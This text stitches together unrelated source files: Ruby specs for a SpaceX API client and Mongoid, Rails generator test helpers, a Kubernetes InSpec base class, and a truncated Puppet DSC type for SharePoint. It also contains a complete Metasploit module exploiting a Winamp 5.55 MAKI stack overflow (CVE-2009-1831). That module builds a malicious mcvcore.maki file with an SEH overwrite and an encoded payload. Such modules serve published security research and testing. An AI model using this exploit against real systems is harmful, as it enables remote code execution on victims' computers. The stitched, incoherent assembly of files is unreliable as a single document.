'thrust_to_weight' => 96
)
expect(first_subject.landing_legs).to eq(
'number' => 0,
'material' => nil
)
expect(first_subject.wikipedia).to eq(
'https://en.wikipedia.org/wiki/Falcon_1'
)
expect(first_subject.description).to eq(
'The Falcon 1 was an expendable launch system '\
'privately developed and manufactured by SpaceX during 2006-2009. '\
'On 28 September 2008, Falcon 1 became the first '\
'privately-developed liquid-fuel launch vehicle to '\
'go into orbit around the Earth.'
)
expect(first_subject.rocket_id).to eq 'falcon1'
expect(first_subject.rocket_name).to eq 'Falcon 1'
expect(first_subject.rocket_type).to eq 'rocket'
expect(first_subject.flickr_images).to eq(
[
'https://www.spacex.com/sites/spacex/files/styles/media_gallery_large/public/2009_-_01_liftoff_south_full_wide_ro8a1280_edit.jpg?itok=8loiSGt1',
'https://www.spacex.com/sites/spacex/files/styles/media_gallery_large/public/2009_-_02_default_liftoff_west_full_wide_nn6p2062_xl.jpg?itok=p776nHsM'
]
)
end
end
context "#info('falcon1')", vcr: { cassette_name: 'rockets/info/falcon1' } do
subject do
SPACEX::Rockets.info('falcon1')
end
it 'returns Rocket info for "falcon1"' do
expect(subject.id).to eq 1
expect(subject.active).to eq false
expect(subject.stages).to eq 2
expect(subject.boosters).to eq 0
expect(subject.cost_per_launch).to eq 6_700_000
expect(subject.success_rate_pct).to eq 40
expect(subject.first_flight).to eq '2006-03-24'
expect(subject.country).to eq 'Republic of the Marshall Islands'
expect(subject.company).to eq 'SpaceX'
expect(subject.height).to eq('meters' => 22.25, 'feet' => 73)
expect(subject.diameter).to eq('meters' => 1.68, 'feet' => 5.5)
expect(subject.mass).to eq('kg' => 30_146, 'lb' => 66_460)
expect(subject.payload_weights).to eq [{
'id' => 'leo',
'name' => 'Low Earth Orbit',
'kg' => 450,
'lb' => 992
}]
expect(subject.first_stage).to eq(
'reusable' => false,
'engines' => 1,
'fuel_amount_tons' => 44.3,
'burn_time_sec' => 169,
'thrust_sea_level' => {
'kN' => 420,
'lbf' => 94_000
},
'thrust_vacuum' => {
'kN' => 480,
'lbf' => 110_000
}
)
expect(subject.second_stage).to eq(
'engines' => 1,
'fuel_amount_tons' => 3.38,
'burn_time_sec' => 378,
'thrust' => {
'kN' => 31,
'lbf' => 7000
},
'payloads' => {
'option_1' => 'composite fairing',
'composite_fairing' => {
'height' => {
'meters' => 3.5,
'feet' => 11.5
},
'diameter' => {
'meters' => 1.5,
'feet' => 4.9
}
}
}
)
expect(subject.engines).to eq(
'number' => 1,
'type' => 'merlin',
'version' => '1C',
'layout' => 'single',
'engine_loss_max' => 0,
'propellant_1' => 'liquid oxygen',
'propellant_2' => 'RP-1 kerosene',
'thrust_sea_level' => {
'kN' => 420,
'lbf' => 94_000
},
'thrust_vacuum' => {
'kN' => 480,
'lbf' => 110_000
},
'thrust_to_weight' => 96
)
expect(subject.landing_legs).to eq('number' => 0, 'material' => nil)
expect(subject.wikipedia).to eq 'https://en.wikipedia.org/wiki/Falcon_1'
expect(subject.description).to eq(
'The Falcon 1 was an expendable launch system '\
'privately developed and manufactured by SpaceX during 2006-2009. '\
'On 28 September 2008, Falcon 1 became the first '\
'privately-developed liquid-fuel launch vehicle to '\
'go into orbit around the Earth.'
)
expect(subject.rocket_id).to eq 'falcon1'
expect(subject.rocket_name).to eq 'Falcon 1'
expect(subject.rocket_type).to eq 'rocket'
end
end
end
| 31.985782 | 158 | 0.532375 |
f74c724b5698f41ae81861441e29eea0701122cc
| 1,534 |
require "spec_helper"
describe Mongoid::Persistence::Atomic::PullAll do
describe "#persist" do
context "when the field exists" do
let(:person) do
Person.create(aliases: [ "007" ])
end
let!(:pulled) do
person.pull_all(:aliases, [ "007" ])
end
let(:reloaded) do
person.reload
end
it "pulls the value from the array" do
person.aliases.should be_empty
end
it "persists the data" do
reloaded.aliases.should be_empty
end
it "removes the field from the dirty attributes" do
person.changes["aliases"].should be_nil
end
it "resets the document dirty flag" do
person.should_not be_changed
end
it "returns the new array value" do
pulled.should be_empty
end
end
context "when the field does not exist" do
let(:person) do
Person.create
end
let!(:pulled) do
person.pull_all(:aliases, [ "Bond" ])
end
let(:reloaded) do
person.reload
end
it "does not modify the field" do
person.aliases.should be_nil
end
it "persists no data" do
reloaded.aliases.should be_nil
end
it "removes the field from the dirty attributes" do
person.changes["aliases"].should be_nil
end
it "resets the document dirty flag" do
person.should_not be_changed
end
it "returns nil" do
pulled.should be_nil
end
end
end
end
| 19.666667 | 57 | 0.592568 |
1d5b3478304877016e6b58ee0a83909fd036d691
| 81 |
require_relative 'deployment/tasks'
require_relative 'deployment/set_railman_env'
| 40.5 | 45 | 0.888889 |
d575b94d5e2d034cce6946958dd6631cde6a51d1
| 2,018 |
$:.unshift(File.dirname(__FILE__) + "/../../rails_generators")
require "rubygems"
require 'mongo_mapper_generators'
require "rails_generator"
require 'rails_generator/scripts/generate'
require "fileutils"
web_app_theme_root = File.join(File.dirname(__FILE__), "/../../")
tmp_rails_app_name = "tmp_rails_app"
tmp_rails_app_root = File.join(web_app_theme_root, tmp_rails_app_name)
Rails::Generator::Base.prepend_sources Rails::Generator::PathSource.new(:mongo_mapper_generators, File.join(File.dirname(__FILE__), "..", "..", "rails_generators"))
module GeneratorHelpers
def generate_rails_app
FileUtils.mkdir(File.join(@app_root))
end
def remove_models
FileUtils.rm_rf(File.join(@app_root, "app", "models"))
end
def generate_mongo_model(*args)
options = !args.empty? && args.last.is_a?(Hash) ? args.pop : {}
options.merge!({:destination => @app_root, :quiet => true})
args << options
run_generator(*args)
end
def model_exists?(filename)
File.exists?(File.join(@app_root, "app", "models", filename))
end
def unit_test_exists?(filename)
File.exists?(File.join(@app_root, "test", "unit", filename))
end
# Instantiates the Generator.
def build_generator(name, params, options)
Rails::Generator::Base.instance(name, params, options)
end
# Runs the +create+ command (like the command line does).
def run_generator(name, params=[], options={})
silence_generator do
build_generator(name, params, options).command(:create).invoke!
end
end
# Silences the logger temporarily and returns the output as a String.
def silence_generator
logger_original = Rails::Generator::Base.logger
myout = StringIO.new
Rails::Generator::Base.logger = Rails::Generator::SimpleLogger.new(myout)
yield if block_given?
Rails::Generator::Base.logger = logger_original
myout.string
end
end
Before do
@app_root = tmp_rails_app_root
end
After do
FileUtils.rm_rf(tmp_rails_app_root)
end
World(GeneratorHelpers)
| 29.246377 | 165 | 0.722002 |
f7188845e6adcfdd8a0bcbc98fac9bd8c5bbdce5
| 3,070 |
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Winamp MAKI Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Winamp 5.55. The flaw
exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,
where memmove is used with in a insecure way with user controlled data.
To exploit the vulnerability the attacker must convince the attacker to install the
generated mcvcore.maki file in the "scripts" directory of the default "Bento" skin,
or generate a new skin using the crafted mcvcore.maki file. The module has been
tested successfully on Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Monica Sojeong Hong', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2009-1831'],
[ 'OSVDB', '54902'],
[ 'BID', '35052'],
[ 'EDB', '8783'],
[ 'EDB', '8772'],
[ 'EDB', '8770'],
[ 'EDB', '8767'],
[ 'URL', 'http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 4000,
'DisableNops' => true,
'BadChars' => ""
},
'Platform' => 'win',
'Targets' =>
[
# winamp.exe 5.5.5.2405
[ 'Winamp 5.55 / Windows XP SP3 / Windows 7 SP1',
{
'Ret' => 0x12f02bc3, # ppr from in_mod.dll
'Offset' => 16756
}
]
],
'Privileged' => false,
'DisclosureDate' => 'May 20 2009',
'DefaultTarget' => 0))
deregister_options('FILENAME')
end
def file_format_filename
'mcvcore.maki'
end
def exploit
sploit = rand_text(target['Offset'])
sploit << generate_seh_record(target.ret)
sploit << payload.encoded
length_sploit = [sploit.length].pack("v")
header = "\x46\x47" # magic
header << "\x03\x04" # version
header << "\x17\x00\x00\x00"
types = "\x01\x00\x00\x00" # count
# class 1 => Object
types << "\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5\x32\x35\xF3\xE7"
# functions
functions = "\x37\x00\x00\x00" # count
#function 1
functions << "\x01\x01" # class
functions << "\x00\x00" # dummy
functions << length_sploit # function name length
functions << sploit # crafted function name
maki = header
maki << types
maki << functions
print_status("Creating '#{file_format_filename}' file ...")
file_create(maki)
end
end
| 28.165138 | 100 | 0.600651 |
b979c1a2e41659f6d7932aec83e316bfb8057e4c
| 1,012 |
# frozen_string_literal: true
# K8s Inspec Backend Classes
#
# Based on the GCP Inspec classes
#
require 'json'
# Base class for K8s resources - depends on train K8s transport for connection
class K8sResourceBase < Inspec.resource(1)
attr_reader :opts, :k8s, :item, :count
def initialize(opts)
@opts = opts
@k8s = inspec.backend
@count = item.length if item.respond_to? :length
end
def failed_resource?
@failed_resource
end
# Intercept K8s client exceptions
def catch_k8s_errors
yield
# create custom messages as needed
rescue K8s::Error::Conflict => e
error = JSON.parse(e.body)
fail_resource error['error']['message']
@failed_resource = true
nil
rescue K8s::Error::NotFound => e
error = JSON.parse(e.body)
fail_resource error['error']['message']
@failed_resource = true
nil
rescue Excon::Error::Socket => e
error = JSON.parse(e.body)
fail_resource error['error']['message']
@failed_resource = true
nil
end
end
| 22.488889 | 78 | 0.686759 |
187d9f9ee4cb74452216da9fca0d244fcecd22b7
| 1,111 |
require File.expand_path('../boot', __FILE__)
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module Arrr
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
# Do not swallow errors in after_commit/after_rollback callbacks.
config.active_record.raise_in_transactional_callbacks = true
end
end
| 41.148148 | 99 | 0.732673 |
875a0cd4a8be9b7a1cda5bfd610620199e74ed61
| 392 |
# encoding: utf-8
module PlatformHelpers
def debian?
family == 'debian'
end
def ubuntu?
family == 'ubuntu'
end
def centos?
family == 'redhat' && %w(5.9 6.4 6.5).include?(release)
end
def fedora?
family == 'fedora'
end
private
def family
RSpec.configuration.os[:family].downcase
end
def release
RSpec.configuration.os[:release]
end
end
| 13.066667 | 59 | 0.627551 |
b945d3ead35b276975c659791f53c401a110bbba
| 237 |
require 'acts_as_indexed'
begin
Refinery::Resource.class_eval do
# Docs for acts_as_indexed http://github.com/dougal/acts_as_indexed
acts_as_indexed :fields => [:file_name, :title, :type_of_content]
end
rescue NameError
end
| 23.7 | 71 | 0.767932 |
7a0dc3a9791f7df12a6b526feab14883da495706
| 350 |
class ApplicationController < ActionController::Base
rescue_from Pundit::NotAuthorizedError, with: :user_not_authorized
include Pundit
protect_from_forgery with: :exception
before_action :authenticate_user!
private
def user_not_authorized
flash[:alert] = "Access Denied"
redirect_to (request.referrer || root_path)
end
end
| 23.333333 | 68 | 0.777143 |
d5a33007119aa8183868376d9ae37c582d1d2ebf
| 407 |
module EventsHelper
def stringPad(str)
str = "0" + str.to_s if str.to_s.size == 1
return str.to_s
end
def to_google_calendar(timeObj)
timeObj = timeObj.utc
dateStr = timeObj.year.to_s
dateStr += stringPad(timeObj.month)
dateStr += stringPad(timeObj.day)
dateStr += "T" + stringPad(timeObj.hour)
dateStr += stringPad(timeObj.min) + "00Z"
return dateStr
end
end
| 18.5 | 44 | 0.665848 |
03a61cc7d31716f1ba3ae58fd48c4cdfce1ed6df
| 299 |
class Definition
attr_reader(:definition)
@@definitions = []
def initialize(attributes)
@definition = attributes.fetch(:definition)
end
def self.all
@@definitions
end
def save
@@definitions.push(self.definition)
end
def self.clear
@@definitions = []
end
end
| 13.590909 | 47 | 0.668896 |
f870c6e137b2e722da97154bd98470ae026ff1a0
| 22,180 |
require 'pathname'
Puppet::Type.newtype(:dsc_spdistributedcacheclientsettings) do
require Pathname.new(__FILE__).dirname + '../../' + 'puppet/type/base_dsc'
require Pathname.new(__FILE__).dirname + '../../puppet_x/puppetlabs/dsc_type_helpers'
@doc = %q{
The DSC SPDistributedCacheClientSettings resource type.
Automatically generated from
'SharePointDsc/DSCResources/MSFT_SPDistributedCacheClientSettings/MSFT_SPDistributedCacheClientSettings.schema.mof'
To learn more about PowerShell Desired State Configuration, please
visit https://technet.microsoft.com/en-us/library/dn249912.aspx.
For more information about built-in DSC Resources, please visit
https://technet.microsoft.com/en-us/library/dn249921.aspx.
For more information about xDsc Resources, please visit
https://github.com/PowerShell/DscResources.
}
validate do
fail('dsc_issingleinstance is a required attribute') if self[:dsc_issingleinstance].nil?
end
def dscmeta_resource_friendly_name; 'SPDistributedCacheClientSettings' end
def dscmeta_resource_name; 'MSFT_SPDistributedCacheClientSettings' end
def dscmeta_module_name; 'SharePointDsc' end
def dscmeta_module_version; '2.2.0.0' end
newparam(:name, :namevar => true ) do
end
ensurable do
newvalue(:exists?) { provider.exists? }
newvalue(:present) { provider.create }
defaultto { :present }
end
# Name: PsDscRunAsCredential
# Type: MSFT_Credential
# IsMandatory: False
# Values: None
newparam(:dsc_psdscrunascredential) do
def mof_type; 'MSFT_Credential' end
def mof_is_embedded?; true end
desc "PsDscRunAsCredential"
validate do |value|
unless value.kind_of?(Hash)
fail("Invalid value '#{value}'. Should be a hash")
end
PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("Credential", value)
end
end
# Name: IsSingleInstance
# Type: string
# IsMandatory: True
# Values: ["Yes"]
newparam(:dsc_issingleinstance) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "IsSingleInstance - Unique key for the resource. Set to 'Yes' to apply configuration. Valid values are Yes."
isrequired
validate do |value|
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
unless ['Yes', 'yes'].include?(value)
fail("Invalid value '#{value}'. Valid values are Yes")
end
end
end
# Name: DLTCMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dltcmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DLTCMaxConnectionsToServer - Maximum number of connections to the Distributed Logon Token Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DLTCRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dltcrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DLTCRequestTimeout - Request timeout for the Distributed Logon Token Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DLTCChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dltcchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DLTCChannelOpenTimeOut - Channel timeout for the Distributed Logon Token Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DVSCMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dvscmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DVSCMaxConnectionsToServer - Maximum number of connections to the Distributed View State Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DVSCRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dvscrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DVSCRequestTimeout - Request timeout for the Distributed View State Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DVSCChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dvscchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DVSCChannelOpenTimeOut - Channel timeout for the Distributed View State Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DACMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dacmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DACMaxConnectionsToServer - Maximum number of connections to the Distributed Access Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DACRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dacrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DACRequestTimeout - Request timeout for the Distributed Access Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DACChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dacchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DACChannelOpenTimeOut - Channel timeout for the Distributed Access Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DAFMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dafmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DAFMaxConnectionsToServer - Maximum number of connections to the Distributed Activity Feed Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DAFRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dafrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DAFRequestTimeout - Request timeout for the Distributed Activity Feed Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DAFChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dafchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DAFChannelOpenTimeOut - Channel timeout for the Distributed Activity Feed Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DAFCMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dafcmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DAFCMaxConnectionsToServer - Maximum number of connections to the Distributed Activity Feed LMT Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DAFCRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dafcrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DAFCRequestTimeout - Request timeout for the Distributed Activity Feed LMT Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DAFCChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dafcchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DAFCChannelOpenTimeOut - Channel timeout for the Distributed Activity Feed LMT Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DBCMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dbcmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DBCMaxConnectionsToServer - Maximum number of connections to the Distributed Bouncer Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DBCRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dbcrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DBCRequestTimeout - Request timeout for the Distributed Bouncer Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DBCChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dbcchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DBCChannelOpenTimeOut - Channel timeout for the Distributed Bouncer Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DDCMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_ddcmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DDCMaxConnectionsToServer - Maximum number of connections to the Distributed Default Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DDCRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_ddcrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DDCRequestTimeout - Request timeout for the Distributed Default Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DDCChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_ddcchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DDCChannelOpenTimeOut - Channel timeout for the Distributed Default Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DSCMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dscmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DSCMaxConnectionsToServer - Maximum number of connections to the Distributed Search Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DSCRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dscrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DSCRequestTimeout - Request timeout for the Distributed Search Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DSCChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dscchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DSCChannelOpenTimeOut - Channel timeout for the Distributed Search Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DTCMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dtcmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DTCMaxConnectionsToServer - Maximum number of connections to the Distributed Security Trimming Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DTCRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dtcrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DTCRequestTimeout - Request timeout for the Distributed Security Trimming Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DTCChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dtcchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DTCChannelOpenTimeOut - Channel timeout for the Distributed Security Trimming Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DSTACMaxConnectionsToServer
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dstacmaxconnectionstoserver) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DSTACMaxConnectionsToServer - Maximum number of connections to the Distributed Server to Application Server Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DSTACRequestTimeout
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dstacrequesttimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DSTACRequestTimeout - Request timeout for the Distributed Server to Application Server Cache"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: DSTACChannelOpenTimeOut
# Type: uint32
# IsMandatory: False
# Values: None
newparam(:dsc_dstacchannelopentimeout) do
def mof_type; 'uint32' end
def mof_is_embedded?; false end
desc "DSTACChannelOpenTimeOut - Channel timeout for the Distributed Server to Application Server Cache"
validate do |value|
